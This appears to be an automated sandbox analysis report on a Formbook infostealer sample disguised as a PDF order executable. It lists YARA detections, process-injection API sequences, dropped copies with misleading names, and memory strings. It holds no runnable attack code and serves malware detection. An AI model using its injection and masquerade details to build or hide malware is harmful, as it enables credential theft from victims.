Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
AutoIt script contains suspicious strings
Source: orden pdf.exe AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Source: DeviceCensus.exe.exe.0.dr AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Source: cx9l_rq2dula.exe.3.dr AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\orden pdf.exe Code function: This is a third-party compiled AutoIt script. 0_2_00173D19
Source: orden pdf.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\Desktop\orden pdf.exe Code function: This is a third-party compiled AutoIt script. 1_2_00173D19
Source: orden pdf.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Contains functionality to call native functions
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD NtOpenSection,NtMapViewOfSection, 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_01461C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread, 0_3_01461C09
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419850 NtCreateFile, 2_2_00419850
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419900 NtReadFile, 2_2_00419900
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419980 NtClose, 2_2_00419980
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419A30 NtAllocateVirtualMemory, 2_2_00419A30
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_004198FA NtReadFile, 2_2_004198FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041997A NtClose, 2_2_0041997A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419A2A NtAllocateVirtualMemory, 2_2_00419A2A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_017A9910
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A99A0 NtCreateSection,LdrInitializeThunk, 2_2_017A99A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_017A9860
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9840 NtDelayExecution,LdrInitializeThunk, 2_2_017A9840
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_017A98F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A50 NtCreateFile,LdrInitializeThunk, 2_2_017A9A50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A20 NtResumeThread,LdrInitializeThunk, 2_2_017A9A20
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_017A9A00
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9540 NtReadFile,LdrInitializeThunk, 2_2_017A9540
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A95D0 NtClose,LdrInitializeThunk, 2_2_017A95D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9710 NtQueryInformationToken,LdrInitializeThunk, 2_2_017A9710
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_017A97A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9780 NtMapViewOfSection,LdrInitializeThunk, 2_2_017A9780
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_017A9660
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_017A96E0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9950 NtQueueApcThread, 2_2_017A9950
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A99D0 NtCreateProcessEx, 2_2_017A99D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AB040 NtSuspendThread, 2_2_017AB040
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9820 NtEnumerateKey, 2_2_017A9820
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A98A0 NtWriteVirtualMemory, 2_2_017A98A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9B00 NtSetValueKey, 2_2_017A9B00
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA3B0 NtGetContextThread, 2_2_017AA3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A10 NtQuerySection, 2_2_017A9A10
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A80 NtOpenDirectoryObject, 2_2_017A9A80
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9560 NtWriteFile, 2_2_017A9560
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AAD30 NtSetContextThread, 2_2_017AAD30
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9520 NtWaitForSingleObject, 2_2_017A9520
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A95F0 NtQueryInformationFile, 2_2_017A95F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9770 NtSetInformationFile, 2_2_017A9770
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA770 NtOpenThread, 2_2_017AA770
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9760 NtOpenProcess, 2_2_017A9760
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9730 NtQueryVirtualMemory, 2_2_017A9730
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA710 NtOpenProcessToken, 2_2_017AA710
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9FE0 NtCreateMutant, 2_2_017A9FE0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9670 NtQueryInformationProcess, 2_2_017A9670
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9650 NtQueryValueKey, 2_2_017A9650
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9610 NtEnumerateValueKey, 2_2_017A9610
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A96D0 NtCreateKey, 2_2_017A96D0
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_3_00CE00AD NtOpenSection,NtMapViewOfSection, 5_3_00CE00AD
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6606: CreateFileW,DeviceIoControl,CloseHandle, 0_2_001B6606
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_001AACC5
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_001B79D3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_001B79D3
Detected potential crypto function
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017E3B0 0_2_0017E3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00183200 0_2_00183200
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00183B70 0_2_00183B70
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A410F 0_2_001A410F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001902A4 0_2_001902A4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A038E 0_2_001A038E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A467F 0_2_001A467F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001906D9 0_2_001906D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DAACE 0_2_001DAACE
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A4BEF 0_2_001A4BEF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019CCC1 0_2_0019CCC1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00176F07 0_2_00176F07
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017AF50 0_2_0017AF50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019B043 0_2_0019B043
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018B11F 0_2_0018B11F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019D1B9 0_2_0019D1B9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001D31BC 0_2_001D31BC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019123A 0_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A724D 0_2_001A724D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B13CA 0_2_001B13CA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001793F0 0_2_001793F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018F563 0_2_0018F563
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001796C0 0_2_001796C0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BB6CC 0_2_001BB6CC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001777B0 0_2_001777B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DF7FF 0_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A79C9 0_2_001A79C9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018FA57 0_2_0018FA57
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00179B60 0_2_00179B60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00177D19 0_2_00177D19
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018FE6F 0_2_0018FE6F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00199ED0 0_2_00199ED0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A410F 1_2_001A410F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001902A4 1_2_001902A4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A038E 1_2_001A038E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0017E3B0 1_2_0017E3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A467F 1_2_001A467F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001906D9 1_2_001906D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DAACE 1_2_001DAACE
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A4BEF 1_2_001A4BEF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019CCC1 1_2_0019CCC1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00176F07 1_2_00176F07
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0017AF50 1_2_0017AF50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019B043 1_2_0019B043
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018B11F 1_2_0018B11F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019D1B9 1_2_0019D1B9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001D31BC 1_2_001D31BC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00183200 1_2_00183200
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019123A 1_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A724D 1_2_001A724D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B13CA 1_2_001B13CA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001793F0 1_2_001793F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018F563 1_2_0018F563
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001796C0 1_2_001796C0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BB6CC 1_2_001BB6CC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001777B0 1_2_001777B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DF7FF 1_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A79C9 1_2_001A79C9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018FA57 1_2_0018FA57
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00183B70 1_2_00183B70
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00179B60 1_2_00179B60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00177D19 1_2_00177D19
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018FE6F 1_2_0018FE6F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00199ED0 1_2_00199ED0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00177FA3 1_2_00177FA3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041D80C 2_2_0041D80C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401027 2_2_00401027
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041D141 2_2_0041D141
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401176 2_2_00401176
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C9D9 2_2_0041C9D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041CC95 2_2_0041CC95
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041DF0C 2_2_0041DF0C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409F80 2_2_00409F80
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176F900 2_2_0176F900
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821002 2_2_01821002
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B090 2_2_0177B090
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179EBB0 2_2_0179EBB0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01760D20 2_2_01760D20
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01831D55 2_2_01831D55
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01786E30 2_2_01786E30
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01383200 5_2_01383200
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013A410F 5_2_013A410F
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_0138F563 5_2_0138F563
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_0139B043 5_2_0139B043
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01376F07 5_2_01376F07
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01379B60 5_2_01379B60
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013777B0 5_2_013777B0
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013A4BEF 5_2_013A4BEF
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01399ED0 5_2_01399ED0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00197E58 appears 46 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0017CB37 appears 48 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0019F8A0 appears 68 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018EC2F appears 136 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018F55E appears 41 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00196AC0 appears 83 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00182C20 appears 42 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00190FA7 appears 42 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018D17C appears 38 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0019185B appears 36 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0017CE19 appears 51 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018DCBE appears 41 times
PE file contains strange resources
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAMEF vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAMEN vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameo\ vs orden pdf.exe
Source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs orden pdf.exe
Source: orden pdf.exe, 00000002.00000002.300214907.0000000001733000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs orden pdf.exe
Uses 32bit PE files
Source: orden pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
